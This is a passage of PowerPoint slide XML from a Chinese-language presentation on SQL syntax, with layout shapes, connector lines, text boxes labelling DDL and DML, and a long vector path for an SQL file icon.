          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3515022" y="3423056"/>
            <a:ext cx="435157" cy="435156"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="i$liḋe-Straight Connector 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3515935" y="4734874"/>
            <a:ext cx="435157" cy="435156"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3738155" y="2393505"/>
            <a:ext cx="1285232" cy="1285232"/>
            <a:chOff x="3770163" y="2393505"/>
            <a:chExt cx="1285232" cy="1285232"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="i$liḋe-Freeform: Shape 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="18900000">
              <a:off x="3770163" y="2393505"/>
              <a:ext cx="1285232" cy="128523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latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="75" name="文本框 74"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3783143" y="2577013"/>
              <a:ext cx="1259270" cy="918216"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ct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数据定义语言（</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DDL</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8" name="组合 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3738154" y="4962626"/>
            <a:ext cx="1286895" cy="1285233"/>
            <a:chOff x="3770162" y="4962626"/>
            <a:chExt cx="1286895" cy="1285233"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="i$liḋe-Freeform: Shape 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="18900000">
              <a:off x="3770162" y="4962626"/>
              <a:ext cx="1285232" cy="1285233"/>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latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="文本框 76"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3797787" y="5170030"/>
              <a:ext cx="1259270" cy="918216"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ct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数据操作语言（</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DML</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 name="组合 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2293517" y="3513368"/>
            <a:ext cx="1566354" cy="1566352"/>
            <a:chOff x="2325525" y="3513368"/>
            <a:chExt cx="1566354" cy="1566352"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="i$liḋe-Freeform: Shape 35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="18900000">
              <a:off x="2325525" y="3513368"/>
              <a:ext cx="1566354" cy="156635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latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73" name="文本框 72"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2353933" y="3944917"/>
              <a:ext cx="1509531" cy="702773"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ct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两部分组成</a:t>
              </a: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圆角 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5533877" y="2684734"/>
            <a:ext cx="5400600" cy="70277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DDL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用于定义数据库结构</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596727" y="875216"/>
            <a:ext cx="2231857" cy="508862"/>
            <a:chOff x="596727" y="875216"/>
            <a:chExt cx="2231857" cy="508862"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="组合 1"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="596727" y="875216"/>
              <a:ext cx="2231857" cy="508862"/>
              <a:chOff x="1420106" y="1402730"/>
              <a:chExt cx="2231857" cy="508862"/>
            </a:xfrm>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="20000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="30" name="Round Same Side Corner Rectangle 29"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="2568651" y="828281"/>
                <a:ext cx="508861" cy="165776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Calibri" panose="020F0502020204030204"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                  <a:sym typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="32" name="Rectangle 62"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2053958" y="1402731"/>
                <a:ext cx="1598005"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SQL</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语法</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24" name="sql-open-file-format_28954"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="743432" y="953861"/>
              <a:ext cx="335838" cy="348616"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 456840 w 584211"/>
                <a:gd name="connsiteY0" fmla="*/ 401235 h 606439"/>
                <a:gd name="connsiteX1" fmla="*/ 478574 w 584211"/>
                <a:gd name="connsiteY1" fmla="*/ 401235 h 606439"/>
                <a:gd name="connsiteX2" fmla="*/ 478574 w 584211"/>
                <a:gd name="connsiteY2" fmla="*/ 413443 h 606439"/>
                <a:gd name="connsiteX3" fmla="*/ 456840 w 584211"/>
                <a:gd name="connsiteY3" fmla="*/ 413443 h 606439"/>
                <a:gd name="connsiteX4" fmla="*/ 430943 w 584211"/>
                <a:gd name="connsiteY4" fmla="*/ 401235 h 606439"/>
                <a:gd name="connsiteX5" fmla="*/ 452677 w 584211"/>
                <a:gd name="connsiteY5" fmla="*/ 401235 h 606439"/>
                <a:gd name="connsiteX6" fmla="*/ 452677 w 584211"/>
                <a:gd name="connsiteY6" fmla="*/ 413443 h 606439"/>
                <a:gd name="connsiteX7" fmla="*/ 430943 w 584211"/>
                <a:gd name="connsiteY7" fmla="*/ 413443 h 606439"/>
                <a:gd name="connsiteX8" fmla="*/ 405539 w 584211"/>
                <a:gd name="connsiteY8" fmla="*/ 401235 h 606439"/>
                <a:gd name="connsiteX9" fmla="*/ 427273 w 584211"/>
                <a:gd name="connsiteY9" fmla="*/ 401235 h 606439"/>
                <a:gd name="connsiteX10" fmla="*/ 427273 w 584211"/>
                <a:gd name="connsiteY10" fmla="*/ 413443 h 606439"/>
                <a:gd name="connsiteX11" fmla="*/ 405539 w 584211"/>
                <a:gd name="connsiteY11" fmla="*/ 413443 h 606439"/>
                <a:gd name="connsiteX12" fmla="*/ 379642 w 584211"/>
                <a:gd name="connsiteY12" fmla="*/ 401235 h 606439"/>
                <a:gd name="connsiteX13" fmla="*/ 401447 w 584211"/>
                <a:gd name="connsiteY13" fmla="*/ 401235 h 606439"/>
                <a:gd name="connsiteX14" fmla="*/ 401447 w 584211"/>
                <a:gd name="connsiteY14" fmla="*/ 413443 h 606439"/>
                <a:gd name="connsiteX15" fmla="*/ 379642 w 584211"/>
                <a:gd name="connsiteY15" fmla="*/ 413443 h 606439"/>
                <a:gd name="connsiteX16" fmla="*/ 502779 w 584211"/>
                <a:gd name="connsiteY16" fmla="*/ 358754 h 606439"/>
                <a:gd name="connsiteX17" fmla="*/ 530158 w 584211"/>
                <a:gd name="connsiteY17" fmla="*/ 358754 h 606439"/>
                <a:gd name="connsiteX18" fmla="*/ 530158 w 584211"/>
                <a:gd name="connsiteY18" fmla="*/ 370891 h 606439"/>
                <a:gd name="connsiteX19" fmla="*/ 502779 w 584211"/>
                <a:gd name="connsiteY19" fmla="*/ 370891 h 606439"/>
                <a:gd name="connsiteX20" fmla="*/ 470389 w 584211"/>
                <a:gd name="connsiteY20" fmla="*/ 358754 h 606439"/>
                <a:gd name="connsiteX21" fmla="*/ 497627 w 584211"/>
                <a:gd name="connsiteY21" fmla="*/ 358754 h 606439"/>
                <a:gd name="connsiteX22" fmla="*/ 497627 w 584211"/>
                <a:gd name="connsiteY22" fmla="*/ 370891 h 606439"/>
                <a:gd name="connsiteX23" fmla="*/ 470389 w 584211"/>
                <a:gd name="connsiteY23" fmla="*/ 370891 h 606439"/>
                <a:gd name="connsiteX24" fmla="*/ 438423 w 584211"/>
                <a:gd name="connsiteY24" fmla="*/ 358754 h 606439"/>
                <a:gd name="connsiteX25" fmla="*/ 465661 w 584211"/>
                <a:gd name="connsiteY25" fmla="*/ 358754 h 606439"/>
                <a:gd name="connsiteX26" fmla="*/ 465661 w 584211"/>
                <a:gd name="connsiteY26" fmla="*/ 370891 h 606439"/>
                <a:gd name="connsiteX27" fmla="*/ 438423 w 584211"/>
                <a:gd name="connsiteY27" fmla="*/ 370891 h 606439"/>
                <a:gd name="connsiteX28" fmla="*/ 405892 w 584211"/>
                <a:gd name="connsiteY28" fmla="*/ 358754 h 606439"/>
                <a:gd name="connsiteX29" fmla="*/ 433271 w 584211"/>
                <a:gd name="connsiteY29" fmla="*/ 358754 h 606439"/>
                <a:gd name="connsiteX30" fmla="*/ 433271 w 584211"/>
                <a:gd name="connsiteY30" fmla="*/ 370891 h 606439"/>
                <a:gd name="connsiteX31" fmla="*/ 405892 w 584211"/>
                <a:gd name="connsiteY31" fmla="*/ 370891 h 606439"/>
                <a:gd name="connsiteX32" fmla="*/ 373503 w 584211"/>
                <a:gd name="connsiteY32" fmla="*/ 358754 h 606439"/>
                <a:gd name="connsiteX33" fmla="*/ 400882 w 584211"/>
                <a:gd name="connsiteY33" fmla="*/ 358754 h 606439"/>
                <a:gd name="connsiteX34" fmla="*/ 400882 w 584211"/>
                <a:gd name="connsiteY34" fmla="*/ 370891 h 606439"/>
                <a:gd name="connsiteX35" fmla="*/ 373503 w 584211"/>
                <a:gd name="connsiteY35" fmla="*/ 370891 h 606439"/>
                <a:gd name="connsiteX36" fmla="*/ 527476 w 584211"/>
                <a:gd name="connsiteY36" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX37" fmla="*/ 546670 w 584211"/>
                <a:gd name="connsiteY37" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX38" fmla="*/ 546670 w 584211"/>
                <a:gd name="connsiteY38" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX39" fmla="*/ 527476 w 584211"/>
                <a:gd name="connsiteY39" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX40" fmla="*/ 504613 w 584211"/>
                <a:gd name="connsiteY40" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX41" fmla="*/ 523948 w 584211"/>
                <a:gd name="connsiteY41" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX42" fmla="*/ 523948 w 584211"/>
                <a:gd name="connsiteY42" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX43" fmla="*/ 504613 w 584211"/>
                <a:gd name="connsiteY43" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX44" fmla="*/ 482244 w 584211"/>
                <a:gd name="connsiteY44" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX45" fmla="*/ 501438 w 584211"/>
                <a:gd name="connsiteY45" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX46" fmla="*/ 501438 w 584211"/>
                <a:gd name="connsiteY46" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX47" fmla="*/ 482244 w 584211"/>
                <a:gd name="connsiteY47" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX48" fmla="*/ 459381 w 584211"/>
                <a:gd name="connsiteY48" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX49" fmla="*/ 478575 w 584211"/>
                <a:gd name="connsiteY49" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX50" fmla="*/ 478575 w 584211"/>
                <a:gd name="connsiteY50" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX51" fmla="*/ 459381 w 584211"/>
                <a:gd name="connsiteY51" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX52" fmla="*/ 435600 w 584211"/>
                <a:gd name="connsiteY52" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX53" fmla="*/ 454794 w 584211"/>
                <a:gd name="connsiteY53" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX54" fmla="*/ 454794 w 584211"/>
                <a:gd name="connsiteY54" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX55" fmla="*/ 435600 w 584211"/>
                <a:gd name="connsiteY55" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX56" fmla="*/ 412808 w 584211"/>
                <a:gd name="connsiteY56" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX57" fmla="*/ 432002 w 584211"/>
                <a:gd name="connsiteY57" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX58" fmla="*/ 432002 w 584211"/>
                <a:gd name="connsiteY58" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX59" fmla="*/ 412808 w 584211"/>
                <a:gd name="connsiteY59" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX60" fmla="*/ 390368 w 584211"/>
                <a:gd name="connsiteY60" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX61" fmla="*/ 409562 w 584211"/>
                <a:gd name="connsiteY61" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX62" fmla="*/ 409562 w 584211"/>
                <a:gd name="connsiteY62" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX63" fmla="*/ 390368 w 584211"/>
                <a:gd name="connsiteY63" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX64" fmla="*/ 367505 w 584211"/>
                <a:gd name="connsiteY64" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX65" fmla="*/ 386769 w 584211"/>
                <a:gd name="connsiteY65" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX66" fmla="*/ 386769 w 584211"/>
                <a:gd name="connsiteY66" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX67" fmla="*/ 367505 w 584211"/>
                <a:gd name="connsiteY67" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX68" fmla="*/ 436800 w 584211"/>
                <a:gd name="connsiteY68" fmla="*/ 281626 h 606439"/>
                <a:gd name="connsiteX69" fmla="*/ 482032 w 584211"/>
                <a:gd name="connsiteY69" fmla="*/ 281626 h 606439"/>
                <a:gd name="connsiteX70" fmla="*/ 482032 w 584211"/>
                <a:gd name="connsiteY70" fmla="*/ 293763 h 606439"/>
                <a:gd name="connsiteX71" fmla="*/ 436800 w 584211"/>
                <a:gd name="connsiteY71" fmla="*/ 293763 h 606439"/>
                <a:gd name="connsiteX72" fmla="*/ 382958 w 584211"/>
                <a:gd name="connsiteY72" fmla="*/ 281626 h 606439"/>
                <a:gd name="connsiteX73" fmla="*/ 428190 w 584211"/>
                <a:gd name="connsiteY73" fmla="*/ 281626 h 606439"/>
                <a:gd name="connsiteX74" fmla="*/ 428190 w 584211"/>
                <a:gd name="connsiteY74" fmla="*/ 293763 h 606439"/>
                <a:gd name="connsiteX75" fmla="*/ 382958 w 584211"/>
                <a:gd name="connsiteY75" fmla="*/ 293763 h 606439"/>
                <a:gd name="connsiteX76" fmla="*/ 165056 w 584211"/>
                <a:gd name="connsiteY76" fmla="*/ 268783 h 606439"/>
                <a:gd name="connsiteX77" fmla="*/ 194902 w 584211"/>
                <a:gd name="connsiteY77" fmla="*/ 310449 h 606439"/>
                <a:gd name="connsiteX78" fmla="*/ 164900 w 584211"/>
                <a:gd name="connsiteY78" fmla="*/ 353433 h 606439"/>
                <a:gd name="connsiteX79" fmla="*/ 136064 w 584211"/>
                <a:gd name="connsiteY79" fmla="*/ 311612 h 606439"/>
                <a:gd name="connsiteX80" fmla="*/ 165056 w 584211"/>
                <a:gd name="connsiteY80" fmla="*/ 268783 h 606439"/>
                <a:gd name="connsiteX81" fmla="*/ 65154 w 584211"/>
                <a:gd name="connsiteY81" fmla="*/ 251984 h 606439"/>
                <a:gd name="connsiteX82" fmla="*/ 26590 w 584211"/>
                <a:gd name="connsiteY82" fmla="*/ 288314 h 606439"/>
                <a:gd name="connsiteX83" fmla="*/ 54347 w 584211"/>
                <a:gd name="connsiteY83" fmla="*/ 321617 h 606439"/>
                <a:gd name="connsiteX84" fmla="*/ 71841 w 584211"/>
                <a:gd name="connsiteY84" fmla="*/ 338075 h 606439"/>
                <a:gd name="connsiteX85" fmla="*/ 55280 w 584211"/>
                <a:gd name="connsiteY85" fmla="*/ 350495 h 606439"/>
                <a:gd name="connsiteX86" fmla="*/ 29856 w 584211"/>
                <a:gd name="connsiteY86" fmla="*/ 342888 h 606439"/>
                <a:gd name="connsiteX87" fmla="*/ 25269 w 584211"/>
                <a:gd name="connsiteY87" fmla="*/ 364003 h 606439"/>
                <a:gd name="connsiteX88" fmla="*/ 53880 w 584211"/>
                <a:gd name="connsiteY88" fmla="*/ 371921 h 606439"/>
                <a:gd name="connsiteX89" fmla="*/ 96876 w 584211"/>
                <a:gd name="connsiteY89" fmla="*/ 336367 h 606439"/>
                <a:gd name="connsiteX90" fmla="*/ 68886 w 584211"/>
                <a:gd name="connsiteY90" fmla="*/ 301201 h 606439"/>
                <a:gd name="connsiteX91" fmla="*/ 49604 w 584211"/>
                <a:gd name="connsiteY91" fmla="*/ 285365 h 606439"/>
                <a:gd name="connsiteX92" fmla="*/ 64688 w 584211"/>
                <a:gd name="connsiteY92" fmla="*/ 273643 h 606439"/>
                <a:gd name="connsiteX93" fmla="*/ 87002 w 584211"/>
                <a:gd name="connsiteY93" fmla="*/ 278378 h 606439"/>
                <a:gd name="connsiteX94" fmla="*/ 92444 w 584211"/>
                <a:gd name="connsiteY94" fmla="*/ 256409 h 606439"/>
                <a:gd name="connsiteX95" fmla="*/ 65154 w 584211"/>
                <a:gd name="connsiteY95" fmla="*/ 251984 h 606439"/>
                <a:gd name="connsiteX96" fmla="*/ 165762 w 584211"/>
                <a:gd name="connsiteY96" fmla="*/ 246162 h 606439"/>
                <a:gd name="connsiteX97" fmla="*/ 108694 w 584211"/>
                <a:gd name="connsiteY97" fmla="*/ 312845 h 606439"/>
                <a:gd name="connsiteX98" fmla="*/ 159464 w 584211"/>
                <a:gd name="connsiteY98" fmla="*/ 375803 h 606439"/>
                <a:gd name="connsiteX99" fmla="*/ 167939 w 584211"/>
                <a:gd name="connsiteY99" fmla="*/ 377976 h 606439"/>
                <a:gd name="connsiteX100" fmla="*/ 217932 w 584211"/>
                <a:gd name="connsiteY100" fmla="*/ 398160 h 606439"/>
                <a:gd name="connsiteX101" fmla="*/ 226485 w 584211"/>
                <a:gd name="connsiteY101" fmla="*/ 375647 h 606439"/>
                <a:gd name="connsiteX102" fmla="*/ 195152 w 584211"/>
                <a:gd name="connsiteY102" fmla="*/ 367341 h 606439"/>
                <a:gd name="connsiteX103" fmla="*/ 195152 w 584211"/>
                <a:gd name="connsiteY103" fmla="*/ 366565 h 606439"/>
                <a:gd name="connsiteX104" fmla="*/ 225940 w 584211"/>
                <a:gd name="connsiteY104" fmla="*/ 308886 h 606439"/>
                <a:gd name="connsiteX105" fmla="*/ 165762 w 584211"/>
                <a:gd name="connsiteY105" fmla="*/ 246162 h 606439"/>
                <a:gd name="connsiteX106" fmla="*/ 416406 w 584211"/>
                <a:gd name="connsiteY106" fmla="*/ 242816 h 606439"/>
                <a:gd name="connsiteX107" fmla="*/ 455923 w 584211"/>
                <a:gd name="connsiteY107" fmla="*/ 242816 h 606439"/>
                <a:gd name="connsiteX108" fmla="*/ 455923 w 584211"/>
                <a:gd name="connsiteY108" fmla="*/ 255024 h 606439"/>
                <a:gd name="connsiteX109" fmla="*/ 416406 w 584211"/>
                <a:gd name="connsiteY109" fmla="*/ 255024 h 606439"/>
                <a:gd name="connsiteX110" fmla="*/ 369480 w 584211"/>
                <a:gd name="connsiteY110" fmla="*/ 242816 h 606439"/>
                <a:gd name="connsiteX111" fmla="*/ 408926 w 584211"/>
                <a:gd name="connsiteY111" fmla="*/ 242816 h 606439"/>
                <a:gd name="connsiteX112" fmla="*/ 408926 w 584211"/>
                <a:gd name="connsiteY112" fmla="*/ 255024 h 606439"/>
                <a:gd name="connsiteX113" fmla="*/ 369480 w 584211"/>
                <a:gd name="connsiteY113" fmla="*/ 255024 h 606439"/>
                <a:gd name="connsiteX114" fmla="*/ 277488 w 584211"/>
                <a:gd name="connsiteY114" fmla="*/ 241970 h 606439"/>
                <a:gd name="connsiteX115" fmla="*/ 245844 w 584211"/>
                <a:gd name="connsiteY115" fmla="*/ 243755 h 606439"/>
                <a:gd name="connsiteX116" fmla="*/ 245844 w 584211"/>
                <a:gd name="connsiteY116" fmla="*/ 376656 h 606439"/>
                <a:gd name="connsiteX117" fmla="*/ 336189 w 584211"/>
                <a:gd name="connsiteY117" fmla="*/ 379762 h 606439"/>
                <a:gd name="connsiteX118" fmla="*/ 336189 w 584211"/>
                <a:gd name="connsiteY118" fmla="*/ 352980 h 606439"/>
                <a:gd name="connsiteX119" fmla="*/ 277488 w 584211"/>
                <a:gd name="connsiteY119" fmla="*/ 351970 h 606439"/>
                <a:gd name="connsiteX120" fmla="*/ 361303 w 584211"/>
                <a:gd name="connsiteY120" fmla="*/ 72971 h 606439"/>
                <a:gd name="connsiteX121" fmla="*/ 358892 w 584211"/>
                <a:gd name="connsiteY121" fmla="*/ 73204 h 606439"/>
                <a:gd name="connsiteX122" fmla="*/ 358892 w 584211"/>
                <a:gd name="connsiteY122" fmla="*/ 205174 h 606439"/>
                <a:gd name="connsiteX123" fmla="*/ 409663 w 584211"/>
                <a:gd name="connsiteY123" fmla="*/ 205174 h 606439"/>
                <a:gd name="connsiteX124" fmla="*/ 409663 w 584211"/>
                <a:gd name="connsiteY124" fmla="*/ 217361 h 606439"/>
                <a:gd name="connsiteX125" fmla="*/ 358892 w 584211"/>
                <a:gd name="connsiteY125" fmla="*/ 217361 h 606439"/>
                <a:gd name="connsiteX126" fmla="*/ 358892 w 584211"/>
                <a:gd name="connsiteY126" fmla="*/ 281638 h 606439"/>
                <a:gd name="connsiteX127" fmla="*/ 375375 w 584211"/>
                <a:gd name="connsiteY127" fmla="*/ 281638 h 606439"/>
                <a:gd name="connsiteX128" fmla="*/ 375375 w 584211"/>
                <a:gd name="connsiteY128" fmla="*/ 293749 h 606439"/>
                <a:gd name="connsiteX129" fmla="*/ 358892 w 584211"/>
                <a:gd name="connsiteY129" fmla="*/ 293749 h 606439"/>
                <a:gd name="connsiteX130" fmla="*/ 358892 w 584211"/>
                <a:gd name="connsiteY130" fmla="*/ 358724 h 606439"/>
                <a:gd name="connsiteX131" fmla="*/ 368378 w 584211"/>
                <a:gd name="connsiteY131" fmla="*/ 358724 h 606439"/>
                <a:gd name="connsiteX132" fmla="*/ 368378 w 584211"/>
                <a:gd name="connsiteY132" fmla="*/ 370912 h 606439"/>
                <a:gd name="connsiteX133" fmla="*/ 358892 w 584211"/>
                <a:gd name="connsiteY133" fmla="*/ 370912 h 606439"/>
                <a:gd name="connsiteX134" fmla="*/ 358892 w 584211"/>
                <a:gd name="connsiteY134" fmla="*/ 401265 h 606439"/>
                <a:gd name="connsiteX135" fmla="*/ 375609 w 584211"/>
                <a:gd name="connsiteY135" fmla="*/ 401265 h 606439"/>
                <a:gd name="connsiteX136" fmla="*/ 375609 w 584211"/>
                <a:gd name="connsiteY136" fmla="*/ 413453 h 606439"/>
                <a:gd name="connsiteX137" fmla="*/ 358892 w 584211"/>
                <a:gd name="connsiteY137" fmla="*/ 413453 h 606439"/>
                <a:gd name="connsiteX138" fmla="*/ 358892 w 584211"/>
                <a:gd name="connsiteY138" fmla="*/ 531760 h 606439"/>
                <a:gd name="connsiteX139" fmla="*/ 361303 w 584211"/>
                <a:gd name="connsiteY139" fmla="*/ 531993 h 606439"/>
                <a:gd name="connsiteX140" fmla="*/ 545259 w 584211"/>
                <a:gd name="connsiteY140" fmla="*/ 531993 h 606439"/>
                <a:gd name="connsiteX141" fmla="*/ 561975 w 584211"/>
                <a:gd name="connsiteY141" fmla="*/ 515303 h 606439"/>
                <a:gd name="connsiteX142" fmla="*/ 561975 w 584211"/>
                <a:gd name="connsiteY142" fmla="*/ 89661 h 606439"/>
                <a:gd name="connsiteX143" fmla="*/ 545259 w 584211"/>
                <a:gd name="connsiteY143" fmla="*/ 72971 h 606439"/>
                <a:gd name="connsiteX144" fmla="*/ 358892 w 584211"/>
                <a:gd name="connsiteY144" fmla="*/ 0 h 606439"/>
                <a:gd name="connsiteX145" fmla="*/ 358892 w 584211"/>
                <a:gd name="connsiteY145" fmla="*/ 50847 h 606439"/>
                <a:gd name="connsiteX146" fmla="*/ 361303 w 584211"/>
                <a:gd name="connsiteY146" fmla="*/ 50692 h 606439"/>
                <a:gd name="connsiteX147" fmla="*/ 545259 w 584211"/>
                <a:gd name="connsiteY147" fmla="*/ 50692 h 606439"/>
                <a:gd name="connsiteX148" fmla="*/ 584211 w 584211"/>
                <a:gd name="connsiteY148" fmla="*/ 89661 h 606439"/>
                <a:gd name="connsiteX149" fmla="*/ 584211 w 584211"/>
                <a:gd name="connsiteY149" fmla="*/ 515303 h 606439"/>
                <a:gd name="connsiteX150" fmla="*/ 545259 w 584211"/>
                <a:gd name="connsiteY150" fmla="*/ 554195 h 606439"/>
                <a:gd name="connsiteX151" fmla="*/ 361303 w 584211"/>
                <a:gd name="connsiteY151" fmla="*/ 554195 h 606439"/>
                <a:gd name="connsiteX152" fmla="*/ 358892 w 584211"/>
                <a:gd name="connsiteY152" fmla="*/ 554117 h 606439"/>
                <a:gd name="connsiteX153" fmla="*/ 358892 w 584211"/>
                <a:gd name="connsiteY153" fmla="*/ 606439 h 606439"/>
                <a:gd name="connsiteX154" fmla="*/ 0 w 584211"/>
                <a:gd name="connsiteY154" fmla="*/ 557378 h 606439"/>
                <a:gd name="connsiteX155" fmla="*/ 0 w 584211"/>
                <a:gd name="connsiteY155" fmla="*/ 47819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584211" h="606439">
                  <a:moveTo>
